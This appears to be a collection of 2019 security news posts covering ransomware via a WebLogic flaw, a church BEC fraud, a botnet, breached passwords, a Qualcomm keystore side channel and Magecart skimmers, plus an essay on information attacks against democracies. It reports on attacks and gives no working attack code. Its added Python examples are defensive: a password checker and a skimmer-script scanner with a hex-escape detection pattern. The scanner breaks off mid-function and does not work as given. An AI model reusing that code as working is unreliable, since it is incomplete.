The warning is included in the annual report published by the Dutch intelligence service, which cited as an example the attack against the world chemical weapons watchdog. In September 2018, Dutch intelligence services arrested two alleged Russian spies who were planning to hack a Swiss laboratory where an investigation into the poisoning of the spy Sergei Skripal was ongoing.

In April 2018 the Dutch authorities expelled four alleged agents from Russia’s GRU military intelligence agency for trying to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

According to the Military Intelligence and Security Service (MIVD), Russia is expanding its arsenal with cyber capabilities; Russia-linked APT groups are a threat to the Netherlands and to all European states.


The AIVD sent a tweet indicating that an (official) English translation of the Annual Report 2018 will be released in a few weeks.

The popular cyber security researcher Matthijs Koot published an unofficial translation of the Annual Report 2018 of the Dutch General Intelligence and Security Service (GISS, known in Dutch as AIVD).

The report described the cyber espionage activities carried out by foreign governments as “very worrying,” Dutch news media reported.

“The threat facing the armed forces is the theft of military technology and technological expertise, which can be used for both military and civil ends,”

“More and more countries are focusing on political and/or economic espionage. We see in our investigations that China, Iran and Russia are at the forefront of this.”

The way the Dutch intelligence service disclosed the information is unusual; in the past, counter-espionage operations were kept secret.

“That was necessary to increase the resilience of society, because less naivety means greater alertness to possible unwanted influences,” MIVD chief General Onno Eichelsheim said in the report.

The report pointed out that China was “actively attempting to gather military intelligence in the Netherlands”.

“The threat against defence is the stealing of military technological knowledge and technology that can be used both militarily and for civilian purposes.”

The Military Intelligence and Security Service (MIVD) also warns that Iran, North Korea, Pakistan and Syria are seeking “knowledge and goods” for their own weapons programmes in the Netherlands and other western countries.

Dutch intelligence is urging defence companies to reinforce their security to repel the growing threats.

Pierluigi Paganini

(SecurityAffairs – MIVD, intelligence)


Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware

Threat actors are exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations.

Threat actors are delivering a new piece of malware, tracked as Sodinokibi, by exploiting a recently patched Oracle WebLogic Server vulnerability.

Oracle WebLogic Server is a Java EE application server developed by Oracle Corporation; it is used by numerous applications and enterprise web portals based on Java technology. The flaw initially received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

On April 26, Oracle addressed the flaw with the release of an out-of-band update.

The threat was detected and analyzed by several firms (e.g. South Korea’s EST Security and Cisco Talos), independent researchers, and intelligence groups.

“Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10.” reads the analysis published by Cisco Talos. “Attackers have been making use of this exploit in the wild since at least April 17.”


Crooks used PowerShell commands to download and execute the malicious payloads; they demanded a ransom ranging from $1,500 worth of Bitcoin up to $2,500. The ransom doubles if the victims do not pay within a specified number of days.

Talos started seeing the first stages of the Sodinokibi attacks — the attackers first looked for exploitable WebLogic servers —

Since April 25, one day before Oracle released the security patches, the experts started observing Sodinokibi ransomware infections.

Talos also noted that threat actors were exploiting the flaw to deliver the popular Gandcrab ransomware.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab,” continues Talos researchers.

Experts discovered that CVE-2019-2725 has also been exploited to deliver cryptocurrency miners and other types of malware. Researchers believe it has likely been exploited in targeted attacks as well.

“Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725,” concludes Talos.

Pierluigi Paganini

(SecurityAffairs – Sodinokibi ransomware, WebLogic)


Norsk Hydro estimates March cyber attack cost at $50 Million

Aluminum producer Norsk Hydro estimated the cost of the massive cyber attack that hit the company in March at around $50 million.

How much does a security breach cost? Potential damages can be very expensive for companies: for example, the transportation giant Maersk announced in 2017 that it would incur hundreds of millions of U.S. dollars in losses due to the massive NotPetya ransomware attack.

Back to the present: in mid-March, the global aluminum producer Norsk Hydro was hit by a “massive” cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S.

The news of the cyber attack had an immediate economic impact and caused a 2.0 percent drop in the share price in early trading on the Oslo Stock Exchange. Just one week after the ransomware attack, the company declared losses of more than $40 million.

The company postponed the publication of the quarterly earnings to June 5 because of the cyber attack.


According to Norsk Hydro, the overall financial impact of the massive attack would be 400-450 million Norwegian kroner ($46-52 million, or 41-46 million euros).

“The cyber attack that hit us on March 19 has affected our entire global organization, with Extruded Solutions having suffered the most significant operational challenges and financial losses,” said President and CEO Svein Richard Brandtzæg. He added that the overall financial impact of the cyber attack is estimated at NOK 400-450 million in the first quarter.

The good news for investors is that the company has robust cyber insurance in place with recognized insurers.

The company did not pay any ransom and has filed a complaint with the Norwegian police, who are investigating the incident.

“The company’s shares dropped 1.65 percent in morning trading on the Oslo Stock Exchange.” AFP reported.

Pierluigi Paganini

(SecurityAffairs – Norsk Hydro, ransomware)


Defending Democracies Against Information Attacks

To better understand influence attacks, we proposed an approach that models democracy itself as an information system and explains how democracies are vulnerable to certain forms of information attacks that autocracies naturally resist. Our model combines ideas from both international security and computer security, avoiding the limitations of both in explaining how influence attacks may damage democracy as a whole.

Our initial account is necessarily limited. Building a truly comprehensive understanding of democracy as an information system will be a Herculean labor, involving the collective endeavors of political scientists and theorists, computer scientists, scholars of complexity, and others.

In this short paper, we undertake a more modest task: providing policy advice to improve the resilience of democracy against these attacks. Specifically, we can show how policy makers not only need to think about how to strengthen systems against attacks, but also need to consider how these efforts intersect with public beliefs -- or common political knowledge -- about these systems, since public beliefs may themselves be an important vector for attacks.

In democracies, many important political decisions are taken by ordinary citizens (typically, in electoral democracies, by voting for political representatives). This means that citizens need to have some shared understandings about their political system, and that the society needs some means of generating shared information regarding who their citizens are and what they want. We call this common political knowledge, and it is largely generated through mechanisms of social aggregation (and the institutions that implement them), such as voting, censuses, and the like. These are imperfect mechanisms, but essential to the proper functioning of democracy. They are often compromised or non-existent in autocratic regimes, since they are potentially threatening to the rulers.

In modern democracies, the most important such mechanism is voting, which aggregates citizens' choices over competing parties and politicians to determine who is to control executive power for a limited period. Another important mechanism is the census process, which plays an important role in the US and in other democracies, in providing broad information about the population, in shaping the electoral system (through the allocation of seats in the House of Representatives), and in policy making (through the allocation of government spending and resources). Of lesser import are public commenting processes, through which individuals and interest groups can comment on significant public policy and regulatory decisions.

All of these systems are vulnerable to attack. Elections are vulnerable to a variety of illegal manipulations, including vote rigging. However, many kinds of manipulation are currently legal in the US, including many forms of gerrymandering, gimmicking voting time, allocating polling booths and resources so as to advantage or disadvantage particular populations, imposing onerous registration and identity requirements, and so on.

Censuses may be manipulated through the provision of bogus information or, more plausibly, through the skewing of policy or resources so that some populations are undercounted. Many of the political battles over the census over the past few decades have been waged over whether the census should undertake statistical measures to counter undersampling bias for populations who are statistically less likely to return census forms, such as minorities and undocumented immigrants. Current efforts to include a question about immigration status may make it less likely that undocumented or recent immigrants will return completed forms.

Finally, public commenting systems too are vulnerable to attacks intended to misrepresent the support for or opposition to specific proposals, including the formation of astroturf (artificial grassroots) groups and the misuse of fake or stolen identities in large-scale mail, fax, email or online commenting systems.

All these attacks are relatively well understood, even if policy choices might be improved by a better understanding of their relationship to shared political knowledge. For example, some voting ID requirements are rationalized through appeals to security concerns about voter fraud. While political scientists have suggested that these concerns are largely unwarranted, we currently lack a framework for evaluating the trade-offs, if any. Computer security concepts such as confidentiality, integrity, and availability could be combined with findings from political science and political theory to provide such a framework.

Even so, the relationship between social aggregation institutions and public beliefs is far less well understood by policy makers. Even when social aggregation mechanisms and institutions are robust against direct attacks, they may be vulnerable to more indirect attacks aimed at destabilizing public beliefs about them.

Democratic societies are vulnerable to (at least) two kinds of knowledge attacks that autocratic societies are not. First are flooding attacks that create confusion among citizens about what other citizens believe, making it far more difficult for them to organize among themselves. Second are confidence attacks. These attempt to undermine public confidence in the institutions of social aggregation, so that their results are no longer broadly accepted as legitimate representations of the citizenry.

Most obviously, democracies will function poorly when citizens do not believe that voting is fair. This makes democracies vulnerable to attacks aimed at destabilizing public confidence in voting institutions. For example, some of Russia's hacking efforts against the 2016 presidential election were designed to undermine citizens' confidence in the result. Russian hacking attacks against Ukraine, which targeted the systems through which election results were reported out, were intended to create confusion among voters about what the outcome actually was. Similarly, the "Guccifer 2.0" hacking identity, which has been attributed to Russian military intelligence, sought to suggest that the US electoral system had been compromised by the Democrats in the days immediately before the presidential vote. If, as expected, Donald Trump had lost the election, these claims could have been combined with the actual evidence of hacking to create the appearance that the election was fundamentally compromised.

Similar attacks against the perception of fairness are likely to be employed against the 2020 US census. Should efforts to include a citizenship question fail, some political actors who are disadvantaged by demographic changes such as increases in foreign-born residents and population shift from rural to urban and suburban areas will mount an effort to delegitimize the census results. Again, the genuine problems with the census, which include not only the citizenship question controversy but also serious underfunding, may help to bolster these efforts.

Mechanisms that allow interested actors and ordinary members of the public to comment on proposed policies are similarly vulnerable. For example, the Federal Communications Commission (FCC) announced in 2017 that it was proposing to repeal its net neutrality ruling. Interest groups backing the FCC rollback correctly anticipated a widespread backlash from a politically active coalition of net neutrality supporters. The result was warfare through public commenting. More than 22 million comments were filed, most of which appeared to be either automatically generated or form letters. Millions of these comments were apparently fake, and attached unsuspecting people's names and email addresses to comments supporting the FCC's repeal efforts. The vast majority of comments that were not either form letters or automatically generated opposed the FCC's proposed ruling. The furor around the commenting process was magnified by claims from inside the FCC (later discredited) that the commenting process had also been subjected to a cyberattack.

We do not yet know the identity and motives of the actors behind the flood of fake comments, although the New York State Attorney-General's office has issued subpoenas for records from a variety of lobbying and advocacy organizations. However, by demonstrating that the commenting process was readily manipulated, the attack made it less likely that the apparently genuine comments of those opposing the FCC's proposed ruling would be treated as useful evidence of what the public believed. The furor over purported cyberattacks, and the FCC's unwillingness itself to investigate the attack, have further undermined confidence in an online commenting system that was intended to make the FCC more open to the US public.

We do not know nearly enough about how democracies function as information systems. Generating a better understanding is itself a major policy challenge, which will require substantial resources and, even more importantly, common understandings and shared efforts across a variety of fields of knowledge that currently don't really engage with each other.

However, even this basic sketch of democracy's informational aspects can provide policy makers with some key lessons. The most important is that it may be as important to bolster shared public beliefs about key institutions such as voting, public commenting, and census taking against attack, as to bolster the mechanisms and related institutions themselves.

Specifically, many efforts to mitigate attacks against democratic systems begin with spreading public awareness and alarm about their vulnerabilities. This has the benefit of increasing awareness about real problems, but it may -- especially if exaggerated for effect -- damage public confidence in the very social aggregation institutions it means to protect. This may mean, for example, that public awareness efforts about Russian hacking that are based on flawed analytic techniques may themselves damage democracy by exaggerating the consequences of attacks.

More generally, this poses important challenges for policy efforts to secure social aggregation institutions against attacks. How can one best secure the systems themselves without damaging public confidence in them? At a minimum, successful policy measures will not simply identify problems in existing systems, but provide practicable, publicly visible, and readily understandable solutions to mitigate them.

We have focused on the problem of confidence attacks in this short essay, because they are both more poorly understood and more profound than flooding attacks. Given historical experience, democracy can probably survive some amount of disinformation about citizens' beliefs better than it can survive attacks aimed at its core institutions of aggregation. Policy makers need a better understanding of the relationship between political institutions and social beliefs: specifically, the importance of the social aggregation institutions that allow democracies to understand themselves.

There are some low-hanging fruit. Very often, hardening these institutions against attacks on their confidence will go hand in hand with hardening them against attacks more generally. Thus, for example, reforms to voting that require permanent paper ballots and random auditing would not only better secure voting against manipulation, but would have moderately beneficial consequences for public beliefs too.

There are likely broadly similar solutions for public commenting systems. Here, the informational trade-offs are less profound than for voting, since there is no need to balance the requirement for anonymity (so that no-one can tell who voted for who ex post) against other requirements (to ensure that no-one votes twice or more, no votes are changed and so on). Instead, the balance to be struck is between general ease of access and security, making it easier, for example, to leverage secondary sources to validate identity.

Both the robustness of and public confidence in the US census and the other statistical systems that guide the allocation of resources could be improved by insulating them better from political control. For example, a similar system could be used to appoint the director of the census to that for the US Comptroller-General, requiring bipartisan agreement for appointment, and making it hard to exert post-appointment pressure on the official.

Our arguments also illustrate how some well-intentioned efforts to combat social influence operations may have perverse consequences for general social beliefs. The perception of security is at least as important as the reality of security, and any defenses against information attacks need to address both.

However, we need far better developed intellectual tools if we are to properly understand the trade-offs, instead of proposing clearly beneficial policies, and avoiding straightforward mistakes. Forging such tools will require computer security specialists to start thinking systematically about public beliefs as an integral part of the systems that they seek to defend. It will mean that more military oriented cybersecurity specialists need to think deeply about the functioning of democracy and the capacity of internal as well as external actors to disrupt it, rather than reaching for their standard toolkit of state-level deterrence tools. Finally, specialists in the workings of democracy have to learn how to think about democracy and its trade-offs in specifically informational terms.

This essay was written with Henry Farrell, and has previously appeared on Defusing Disinfo.

Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack

Crooks have stolen $1.75 million in a church BEC (Business Email Compromise) attack, the victim is the Saint Ambrose Catholic Parish.

Cybercriminals have stolen $1.75 million in a BEC (Business Email Compromise) attack against the Saint Ambrose Catholic Parish.

Saint Ambrose is the second largest church in the Diocese of Cleveland and the largest church in Brunswick, Ohio.

The Saint Ambrose Catholic Parish discovered the BEC attack on April 17, when it learned that payments it had made for its Vision 2020 project had never been received by the contractor, Marous Brothers Construction.

According to the investigation conducted by the FBI and Brunswick police, hackers broke into the parish’s email system, likely via a phishing attack. The attackers tricked the personnel into believing that the contractor had changed its bank, and asked them to transfer the funds to a new bank account under the attackers’ control.


In a letter to the parish, Fr. Bob Stec explained that he was contacted by the contractor, which informed him that it had not received the payments for the past two months.

“On Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months totaling approximately $1,750,000.” reads a letter sent to the parish by Pastor Father Bob Stec.

“This was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.”

According to Stec, the crooks accessed two St. Ambrose employees’ email accounts. The attackers compromised only the email system; they did not access the parish database, which is stored in a secure cloud-based system.

“We are working closely with the Diocese and its insurance program to file a claim in the hopes that Marous Brothers Construction can receive their payment quickly and we can bring this important project for our parish to a positive completion,” Stec said in the letter.

The parish submitted an insurance claim in an attempt to recover the stolen money.

“At the same time, we brought in information technology consultants to review the security and stability of our system, change all passwords, and verify the integrity of our databases and other pertinent information.” Stec added. “They have determined the breach was limited to only two email accounts.”

BEC attacks represent a serious threat to businesses: according to the recently released 2018 Internet Crime Report from the FBI’s Internet Crime Complaint Center (IC3), BEC scams accounted for $1.2 billion in losses.

“In 2018, the IC3 received 20,373 BEC/E-mail Account Compromise (EAC) complaints with adjusted losses of over $1.2 billion” reads the report.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)


ElectrumDoSMiner botnet reached 152,000 hosts

Researchers at Malwarebytes are monitoring the evolution of the ElectrumDoSMiner DDoS botnet that reached 152,000 infected hosts.

MalwareBytes researchers are closely monitoring attacks against users of the popular Electrum Bitcoin wallet, in particular, the evolution of the Electrum DDoS botnet.

In mid-April, experts at MalwareBytes published a report warning of cyber attacks against users of the popular Electrum Bitcoin wallet. According to the experts, crooks already netted over 771 Bitcoins, an amount equivalent to approximately $4 million USD at current exchange rates.

Since that analysis, the cyber criminals have stolen additional funds, bringing the total to USD $4.6 million, but the most concerning aspect of the story is that the botnet they used continues to grow. On April 24, the botnet was composed of fewer than 100,000 bots, but the next day the number peaked at 152,000.

“Since our last blog, the amount of stolen funds has increased to USD $4.6 million, and the botnet that is flooding the Electrum infrastructure is rapidly growing.” reads the analysis published by MalwareBytes. “Case in point, on April 24, the number of infected machines in the botnet was just below 100,000 and the next day it reached its highest at 152,000, according to this online tracker. Since then, it has gone up and down and plateaued at around the 100,000 mark.”

The experts had already monitored two malware campaigns, leveraging the RIG exploit kit and Smoke Loader respectively, that delivered the ElectrumDoSMiner.

MalwareBytes also detected a previously undocumented loader, tracked as Trojan.BeamWinHTTP, that was used by crooks to deliver the ElectrumDoSMiner (transactionservices.exe).

The experts believe that there are many more infection vectors beyond the above loaders they discovered.

Most of the ElectrumDoSMiner infections were observed in the Asia Pacific region (APAC), Brazil and Peru.

“The number of victims that are part of this botnet is constantly changing. We believe as some machines get cleaned up, new ones are getting infected and joining the others to perform DoS attacks.” continues the report. “Malwarebytes detects and removes ElectrumDoSMiner infections on more than 2,000 endpoints daily.”

Further technical details, including Indicators of Compromise (IoCs), are reported in the analysis published by MalwareBytes.

Pierluigi Paganini

(SecurityAffairs – ElectrumDoSMiner, botnet)

The post ElectrumDoSMiner botnet reached 152,000 hosts appeared first on Security Affairs.

Slack warns investors it might be targeted by organized crime, nation-state hackers

Slack Technologies, the company whose cloud-based collaboration tools and services are used by companies worldwide, has warned potential investors that the company faces threats from a wide variety of sources, including “sophisticated organized crime, nation-state, and nation-state supported actors.”

Acknowledging the risk

In the documents it was required to file with the Securities and Exchange Commission (SEC) due to its going public, the company has spelled out the many cyber threats to its existence, functioning …

The post Slack warns investors it might be targeted by organized crime, nation-state hackers appeared first on Help Net Security.

Over 23 million breached accounts were using ‘123456’ as password

A cyber survey conducted by the United Kingdom’s National Cyber Security Centre (NCSC) revealed that ‘123456’ is still the most hacked password.

Security experts at the United Kingdom’s National Cyber Security Centre (NCSC) analyzed the 100,000 most-commonly re-occurring breached passwords using data from Have I Been Pwned (HIBP).

Have I Been Pwned allows users to search across multiple data breaches to see if their email address has been compromised.

The NCSC discovered that 23.2 million user accounts worldwide were using ‘123456’ as password, while 7.7 million users were using ‘123456789’.

This data is disconcerting and shows that we are far from being secure, even though security experts continue to warn users of the cyber risks associated with weak passwords.

Of course, the list of most-hacked passwords also includes other simple entries like ‘qwerty’, ‘password’ and ‘1111111’ in the top five, a gift for hackers.

The list of top breached passwords includes names, musicians, football team names, and fictional characters.

“The NCSC has also today published separate analysis of the 100,000 most commonly re-occurring passwords that have been accessed by third parties in global cyber breaches.” reads the post published by the NCSC.

“The results show a huge number of regularly used passwords breached to access sensitive information.”

The data reported by the NCSC is aligned with the findings of similar studies conducted by security firms. In December, SplashData published its worst passwords list for the 8th year in a row, an annual report based on the analysis of more than 5 million leaked passwords. Below is the 2018 top 10 of the most used passwords published by SplashData:

  1. 123456
  2. password 
  3. 123456789
  4. 12345678
  5. 12345
  6. 111111
  7. 1234567 
  8. sunshine
  9. qwerty
  10. iloveyou

Experts suggest adopting strong passwords and using a unique password for every service a user accesses. Passwords should contain at least 8 characters, including upper and lower case letters, numbers, and symbols (e.g. %$#!). Another good practice is setting up multi-factor authentication wherever possible.

Below are the key findings that emerged from the survey:

  • Only 15% say they know a great deal about how to protect themselves from harmful activity
  • The most regular concern is money being stolen – with 42% feeling it likely to happen by 2021
  • 89% use the internet to make online purchases – with 39% on a weekly basis 
  • One in three rely to some extent on friends and family for help on cyber security
  • Young people more likely to be privacy conscious and careful of what details they share online
  • 61% of internet users check social media daily, but 21% report they never look at social media
  • 70% always use PINs and passwords for smart phones and tablets
  • Less than half do not always use a strong, separate password for their main email account

“We understand that cyber security can feel daunting to a lot of people, but the NCSC has published lots of easily applicable advice to make you much less vulnerable.” said Dr Ian Levy, NCSC Technical Director.

“Password re-use is a major risk that can be avoided – nobody should protect sensitive data with something that can be guessed, like their first name, local football team or favourite band.”

“Using hard-to-guess passwords is a strong first step and we recommend combining three random but memorable words. Be creative and use words memorable to you, so people can’t guess your password.”
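As an added illustration (not code from the post or from the NCSC), the following Python check applies the policy described above: it rejects a password found in the SplashData top 10 quoted earlier, enforces the 8-character minimum and the four character classes, and also generates an NCSC-style three-random-words passphrase. The word list, the `-` separator and the function names are assumptions made for this example; a real deployment would load a full breached-password corpus such as the HIBP data the NCSC analysed instead of the short constructed list.

```python
import re
import secrets

# Constructed from the SplashData 2018 top 10 quoted in the post. A production
# check would load a full breached-password corpus (e.g. the HIBP data the
# NCSC analysed) instead of this short list.
TOP_BREACHED = {
    "123456", "password", "123456789", "12345678", "12345",
    "111111", "1234567", "sunshine", "qwerty", "iloveyou",
}

MIN_LENGTH = 8  # the minimum length the post recommends

# Hypothetical word list for the NCSC "three random words" suggestion; a real
# deployment would use a large dictionary, not this constructed sample.
WORDS = ["copper", "harbour", "ladder", "meadow", "orbit", "pencil",
         "river", "saddle", "thunder", "velvet", "window", "yellow"]


def password_findings(password: str, breached=TOP_BREACHED) -> list:
    """Return the policy violations for `password` (an empty list means it passes).

    Checks, in order: presence in the breached list (case-insensitive),
    minimum length, then the four character classes the post asks for.
    """
    findings = []
    if password.lower() in breached:
        findings.append("appears in breached-password list")
    if len(password) < MIN_LENGTH:
        findings.append(f"shorter than {MIN_LENGTH} characters")
    classes = [
        ("lowercase", r"[a-z]"),
        ("uppercase", r"[A-Z]"),
        ("digit", r"[0-9]"),
        ("symbol", r"[^A-Za-z0-9]"),
    ]
    for name, pattern in classes:
        if not re.search(pattern, password):
            findings.append(f"no {name} character")
    return findings


def three_random_words(words=WORDS, count=3, sep="-") -> str:
    """Build a passphrase the NCSC way: random, memorable words joined together.

    secrets.choice is used instead of random.choice because the result is a
    credential; repeated words are allowed and do not weaken the result.
    """
    return sep.join(secrets.choice(words) for _ in range(count))


def is_three_word_passphrase(candidate: str, words=WORDS, sep="-") -> bool:
    """True when `candidate` is exactly three words from the list (sanity check for the generator)."""
    parts = candidate.split(sep)
    return len(parts) == 3 and all(part in words for part in parts)


if __name__ == "__main__":
    for pw in ("123456", "Sunshine", "Tr0ub4dor&3x", three_random_words()):
        print(f"{pw!r}: {password_findings(pw) or 'passes the 8-character policy'}")
```

Running it shows the tension between the two pieces of advice quoted above: a three-word passphrase fails the uppercase and digit rules of the 8-character policy even though it is long and not on any breached list, so a policy should either accept long passphrases outright or treat the character-class rules as secondary to length and breach checks.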

Pierluigi Paganini

(SecurityAffairs – Top breached passwords, hacking)

The post Over 23 million breached accounts were using ‘123456’ as password appeared first on Security Affairs.

Amnesty International Hong Kong Office hit by state-sponsored attack

The Hong Kong office of Amnesty International has been hit by a long-running cyberattack carried out by China-linked hackers.

Amnesty International’s Hong Kong office has been hit with a cyberattack launched by China-linked hackers.

“This sophisticated cyber-attack underscores the dangers posed by state-sponsored hacking and the need to be ever vigilant to the risk of such attacks. We refuse to be intimidated by this outrageous attempt to harvest information and obstruct our human rights work,” said Man-kei Tam, Director of Amnesty International Hong Kong.

An Amnesty International spokesperson told the South China Morning Post that supporters’ names, Hong Kong identity card numbers and personal contact information were accessed by the hackers; no financial data was compromised.

In response to the cyber attack, the organization set up a “global task force composed of cyber security professionals.”

The organization discovered the security breach on March 15 during a scheduled migration of the Hong Kong office IT infrastructure to its international network.

“The initial findings reveal the attacks were perpetrated using tools and techniques associated with specific advanced persistent threat groups (APTs).” reads the announcement published by Amnesty International. “Cyber forensic experts were able to establish links between the infrastructure used in this attack and previously reported APT campaigns associated with the Chinese government.”

The organization has notified everyone who might have been impacted by the attack of the incident, and it is also providing additional guidance to further ensure their data is secure. Amnesty also reported the attack to Hong Kong’s Office of the Privacy Commissioner for Personal Data.

According to Amnesty International, Chinese authorities are hindering cooperation between international and domestic NGOs.

The group attributed the attack to “a known APT group” that used “tactics, techniques and procedures consistent with a well developed adversary”.

The investigation is still ongoing to determine the extent of the hack and the time window of exposure, but experts fear the attack has been happening already for a few years.

Amnesty is a privileged target for state-sponsored hackers because of its activity with other NGOs, journalists, activists, and civil rights movements worldwide. 

In August 2018, Amnesty International revealed that one of its employees was targeted with surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. 

Pierluigi Paganini

(SecurityAffairs – APT, Amnesty International)

The post Amnesty International Hong Kong Office hit by state-sponsored attack appeared first on Security Affairs.

Most SMBs would pay a ransom in order to recover stolen data

More than half (55 percent) of executives at SMBs said they would pay hackers in order to recover their stolen data in ransomware attacks, according to the second quarterly AppRiver Cyberthreat Index for Business Survey. That number jumps to 74 percent among larger SMBs that employ 150-250 employees, with nearly 4 in 10 (39 percent) going as far as saying they “definitely would pay ransom at almost any price” to prevent their data from being …

The post Most SMBs would pay a ransom in order to recover stolen data appeared first on Help Net Security.

Critical flaw in Qualcomm chips exposes sensitive data for Android Devices

Researchers devised a new side-channel attack in Qualcomm technology, widely used by most Android smartphones, that could expose private keys.

Researchers have uncovered a new side-channel attack that could be exploited by attackers to extract sensitive data, including private keys and passwords, from the Qualcomm secure keystore. The attack potentially impacts most modern Android devices that use Qualcomm chips, including the popular Snapdragon models 820, 835, 845 and 855.

The attack leverages a flaw in the Qualcomm Secure Execution Environment (QSEE), designed to securely store cryptographic keys on devices.

“A side-channel attack can extract private keys from certain versions of Qualcomm’s secure keystore. Recent Android devices include a hardware-backed keystore, which developers can use to protect their cryptographic keys with secure hardware.” reads a blog post published by NCC Group. “On some devices, Qualcomm’s TrustZone-based keystore leaks sensitive information through the branch predictor and memory caches, enabling recovery of 224 and 256-bit ECDSA keys.”

According to NCC, hardware-backed keystores rely on ARM TrustZone to protect sensitive data: on many devices it splits execution into a secure world (used to manage sensitive data) and a normal world (used by the processes of the Android OS).

Experts pointed out that the two worlds share the same underlying microarchitectural structures, meaning an attacker could carry out a side-channel attack to access protected memory.

The experts used a memory cache analyzer called Cachegrab to carry out side-channel attacks on TrustZone.

The experts tested a rooted Nexus 5X device using the Qualcomm Snapdragon 808 and discovered that QSEE was leaking data that could be used to recover 256-bit ECDSA keys.

The attacker must have root access to the device to launch the attack.

Qualcomm has released a security patch to address the flaw, tracked as CVE-2018-11976, while Android included a patch for the flaw in its April update.

Below is the disclosure timeline of the flaw:

  • March 19, 2018: Contact Qualcomm Product Security with issue; receive confirmation of receipt
  • April, 2018: Request update on analysis of issue
  • May, 2018: Qualcomm confirms the issue and begins working on a fix
  • July, 2018: Request update on the fix; Qualcomm responds that the fix is undergoing internal review
  • November, 2018: Request update on the timeline for disclosure; Qualcomm responds that customers have been notified in October, beginning a six-month carrier recertification process. Agree to April 2019 disclosure date.
  • March, 2019: Discuss publication plans for April 23
  • April, 2019: Share draft of paper with Qualcomm
  • April 23, 2019: Public Disclosure

“Providing technologies that support robust security and privacy is a priority for Qualcomm,” a Qualcomm spokesperson told Threatpost. “We commend the NCC Group for using responsible disclosure practices surrounding their security research. Qualcomm Technologies issued fixes to OEMs late last year, and we encourage end users to update their devices as patches become available from OEMs.”

Technical details of the vulnerability are available in the paper published by the experts.

Pierluigi Paganini

(SecurityAffairs – Qualcomm, mobile)

The post Critical flaw in Qualcomm chips exposes sensitive data for Android Devices appeared first on Security Affairs.

Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites

Security experts discovered, hosted on GitHub, the skimmer scripts used by the Magecart cybercrime gang to compromise Magento installations worldwide.

Experts discovered the Magecart skimmer scripts used to compromise a few hundred e-commerce websites worldwide hosted on GitHub.

Security firms have monitored the activities of a dozen Magecart groups since at least 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.

In early April, the security firm Group-IB issued a new comprehensive report on the analysis of JavaScript-sniffers, a type of malware designed to steal customer payment data from online stores. Group-IB researchers analyzed 2,440 infected e-commerce websites with a total of around 1.5 million unique daily visitors whose data could have been compromised.

Experts at MalwareBytes discovered a MageCart skimmer script hosted on GitHub that was uploaded on April 20 and quickly removed by the platform after the experts reported the discovery to the company.

“This latest skimmer is a hex-encoded piece of JavaScript code that was uploaded to GitHub on April 20 by user momo33333, who, as it happens, had just joined the platform on that day as well.” reads the analysis published by MalwareBytes.

The script was uploaded on GitHub by the user ‘momo33333’ who was registered with the platform during the same day.

Jérôme Segura, a security researcher at MalwareBytes, observed momo33333 during the process of setting up the skimmer script. The user initially started with a couple of tests, then published the final obfuscated skimmer payload, ready to be used in campaigns against Magento-based e-commerce stores.

“Just like with any other kind of third-party plugins, compromised Magento sites are loading this script within their source code, right after the CDATA script and/or right before the </html> tag:” wrote Segura.

“It’s worth noting that the compromised Magento sites will remain at risk, even if the GitHub-hosted skimmer is taken down. Indeed, attackers can easily re-infect them in the same manner they initially injected the first one.”

Querying the urlscan.io and PublicWWW search engines, it is possible to determine that at least a couple of hundred websites were compromised using the Magecart skimmer script hosted on GitHub.

As usual, I suggest keeping your installation up to date by running the latest version of the CMS and its plugins.

“It is critical for e-commerce site owners to keep their CMS and its plugins up-to-date, as well as using secure authentication methods. Over the past year, we have identified thousands of sites that are hacked and posing a risk for online shoppers,” concludes the researcher.
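One way to check a store page for the injection pattern Segura describes, as an added example that is not part of the original post or of Malwarebytes’ tooling: it lists every `<script>` in the HTML, flags external ones whose host is not on a first-party allowlist, and flags inline ones that contain a long run of `\xNN` hex escapes like the hex-encoded skimmer. The allowlist hosts, the `.invalid` host in the sample page and the sample page itself are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical first-party hosts the store expects to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# Eight or more consecutive \xNN escapes: the kind of hex-encoded string the
# post describes in the GitHub-hosted skimmer.
HEX_ESCAPE_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")


class ScriptCollector(HTMLParser):
    """Collect every <script> in a page: external ones by src, inline ones by body."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def find_suspicious_scripts(html: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> list:
    """Return human-readable findings for scripts that do not belong on the page."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
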